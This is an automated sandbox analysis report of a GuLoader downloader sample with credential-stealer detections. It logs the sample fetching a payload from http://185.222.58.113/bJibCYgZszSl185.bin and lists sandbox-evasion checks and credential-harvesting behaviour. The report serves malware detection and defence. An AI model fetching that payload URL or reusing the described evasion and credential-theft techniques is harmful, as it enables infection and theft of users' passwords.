Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
004552024107.bat.exe

Overview

General Information

Sample name:004552024107.bat.exe
Analysis ID:1465162
MD5:2d40c2aefef620e7fb177f0cf24d8ea5
SHA1:d4b00320d6be1ecac0fc016f1ad85a9774c14f47
SHA256:576421830912fcb3f31f2721cb30607a7c07887a1558a80b626e0d9527467399
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • 004552024107.bat.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\004552024107.bat.exe" MD5: 2D40C2AEFEF620E7FB177F0CF24D8EA5)
    • 004552024107.bat.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\004552024107.bat.exe" MD5: 2D40C2AEFEF620E7FB177F0CF24D8EA5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.91159403030.0000000035875000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.86246482988.00000000070C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: 004552024107.bat.exe PID: 6660JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Process Memory Space: 004552024107.bat.exe PID: 7736JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 004552024107.bat.exeAvira: detected
          Source: http://185.222.58.113/bJibCYgZszSl185.binAvira URL Cloud: Label: malware
          Source: 004552024107.bat.exeReversingLabs: Detection: 18%
          Source: 004552024107.bat.exeVirustotal: Detection: 16%Perma Link
          Source: 004552024107.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 004552024107.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405A4F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00406620 FindFirstFileA,FindClose,2_2_00406620
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
          Source: unknownDNS query: name: ip-api.com
          Source: global trafficHTTP traffic detected: GET /bJibCYgZszSl185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.222.58.113Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: global trafficHTTP traffic detected: GET /bJibCYgZszSl185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.222.58.113Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: 004552024107.bat.exe, 00000002.00000002.91148181979.0000000005498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.113/bJibCYgZszSl185.bin
          Source: 004552024107.bat.exe, 00000002.00000002.91159403030.0000000035841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
          Source: 004552024107.bat.exe, 00000002.00000002.91159403030.0000000035841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
          Source: 004552024107.bat.exe, 004552024107.bat.exe, 00000002.00000000.86158763790.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 004552024107.bat.exe, 00000000.00000000.86050806311.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 004552024107.bat.exe, 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 004552024107.bat.exe, 00000002.00000000.86158763790.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: 004552024107.bat.exe, 00000002.00000002.91159403030.0000000035841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 004552024107.bat.exe, 00000000.00000000.86050872987.0000000000443000.00000002.00000001.01000000.00000003.sdmp, 004552024107.bat.exe, 00000002.00000000.86158789143.0000000000443000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.skinstudio.netG
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_0040550F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004072D10_2_004072D1
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00406AFA0_2_00406AFA
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_6C601B280_2_6C601B28
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_004072D12_2_004072D1
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00406AFA2_2_00406AFA
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_001588F82_2_001588F8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_001538F82_2_001538F8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_001549102_2_00154910
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_0015F15B2_2_0015F15B
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_0015EA082_2_0015EA08
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_0015BB682_2_0015BB68
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_001540402_2_00154040
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BB5DA82_2_37BB5DA8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BBA5E02_2_37BBA5E0
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BB1AE82_2_37BB1AE8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BB3C202_2_37BB3C20
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BB46102_2_37BB4610
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BB92702_2_37BB9270
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BBC7F82_2_37BBC7F8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BB56C02_2_37BB56C0
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_37BB00402_2_37BB0040
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_001589B02_2_001589B0
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_0015BF102_2_0015BF10
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: String function: 00402C5E appears 50 times
          Source: 004552024107.bat.exe, 00000000.00000000.86050872987.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs 004552024107.bat.exe
          Source: 004552024107.bat.exe, 00000002.00000000.86158789143.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs 004552024107.bat.exe
          Source: 004552024107.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@1/2
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004047BF GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004047BF
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00402198 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_00402198
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semesJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeMutant created: NULL
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsi862.tmpJump to behavior
          Source: 004552024107.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\004552024107.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 004552024107.bat.exeReversingLabs: Detection: 18%
          Source: 004552024107.bat.exeVirustotal: Detection: 16%
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile read: C:\Users\user\Desktop\004552024107.bat.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\004552024107.bat.exe "C:\Users\user\Desktop\004552024107.bat.exe"
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess created: C:\Users\user\Desktop\004552024107.bat.exe "C:\Users\user\Desktop\004552024107.bat.exe"
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess created: C:\Users\user\Desktop\004552024107.bat.exe "C:\Users\user\Desktop\004552024107.bat.exe"Jump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
          Source: 004552024107.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: Process Memory Space: 004552024107.bat.exe PID: 6660, type: MEMORYSTR
          Source: Yara matchFile source: 00000000.00000002.86246482988.00000000070C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_6C601B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6C601B28
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\UserInfo.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semesJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Mesovarian.SpnJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Allopurinol.fluJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Fremlejerettigheders.ObsJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\DispurseJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Dispurse\Charting.skrJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Dispurse\chokoladeforretning.marJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Dispurse\doubling.regJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Dispurse\hmoriderne.nerJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Dispurse\lvens.flbJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Dispurse\materialiter.sigJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Dispurse\preinvest.priJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\StorfyrstindesJump to behavior
